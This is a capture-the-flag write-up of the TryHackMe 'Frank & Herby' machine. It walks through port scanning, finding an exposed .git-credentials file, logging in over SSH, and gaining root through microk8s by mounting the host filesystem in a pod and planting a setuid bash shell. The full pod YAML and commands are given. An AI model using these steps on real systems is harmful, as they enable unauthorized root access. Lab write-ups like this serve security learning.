“The only true wisdom is in knowing you know nothing.” - Socrates

Frank & Herby – Medium

In this writeup we’ll cover a great machine, Frank & Herby make an app by kninja on TryHackMe.
Room: https://tryhackme.com/room/frankandherby

Summary

  • Nmap and rustscan found the following ports open:
    • 22
    • 3000
    • 10250
    • 10255
    • 10257
    • 10259
    • 16443
    • 25000
    • 31337
    • 32000
  • Most of the open ports seemed to relate Kubernetes.
  • Running GoBuster on ports 3000 and 31337, we found that there is a .git-credentials file on the port 31337.
    • Seclists’ dirsearch list was used.
  • URL Encoded creds found inside the file above
  • SSH to host using the creds found above
  • Privilege Escalation by creating a pod with host filesystem mounted. (Microk8s)

Enumeration

  • Nmap and rustscan found the following ports open:
    • 22
    • 3000
    • 10250
    • 10255
    • 10257
    • 10259
    • 16443
    • 25000
    • 31337
    • 32000
  • Most of the open ports seemed to relate Kubernetes.
  • Running GoBuster on ports 3000 and 31337, we found that there is a .git-credentials file on the port 31337.
    • Seclists’ dirsearch list was used.
  • This file seemed to contain credentials.
  • Since these credentials were URL encoded, we decoded them and attempted to use them to SSH on the host. This worked.

 

Privilege Escalation

  • Looking for ways to escalate privileges to root, we found the following:
    • sudo -l (No commands can be run as sudo)
    • find / -type f -perm -u=s 2>/dev/null (Nothing Suspicious)
    • getcap -r / 2>/dev/null (No capabilities that would allow privilege escalation)
    • frank was part of the microk8s group.
      • This allowed us to run microk8s commands
  • We listed the current pods using the following command:
    • microk8s.kubectl get pods
  • We then listed the deployments using the following command:
    • microk8s.kubectl get deployments -o wide
    • We found that the image in use for the listed deployment was:
      • localhost:32000/bsnginx
  • We then attempted to create a pod with the / of host mounted inside the pod
  • Process:
    • Create a file pod.yaml with the following contents:
				
					apiVersion: v1
kind: Pod
metadata:
  name: priv-esc
spec:
  containers:
  - name: shell
    image: localhost:32000/bsnginx
    command:
      - "/bin/bash"
      - "-c"
      - "sleep 10000"
    volumeMounts:
      - name: root
        mountPath: /mnt/root
  volumes:
  - name: root
    hostPath:
      path: /
      type: Directory				
			
    • Deploy pod using the file created above:
      • microk8s.kubectl apply -f pod.yaml
    • Check if the pod is running:
      • microk8s.kubectl get pods
    • Execute a shell on the newly created pod:
      • microk8s.kubectl exec -it priv-esc -- /bin/bash
    • Read the root.txt file:
      • cat /mnt/root/root/root.txt
    • One of the ways to become root on the host is following:
      • Inside the pod run:
        • cd /mnt/root
        • cp bin/bash home/frank/root_shell
        • chmod +xs home/frank/root_shell
      • On the host, run:
        • /home/frank/root_shell -p
    • All Done! 😀

Hope you enjoyed reading this writeup.
Happy Hunting! 😀

Posted by: infinity

Helpful Links

CONTENTS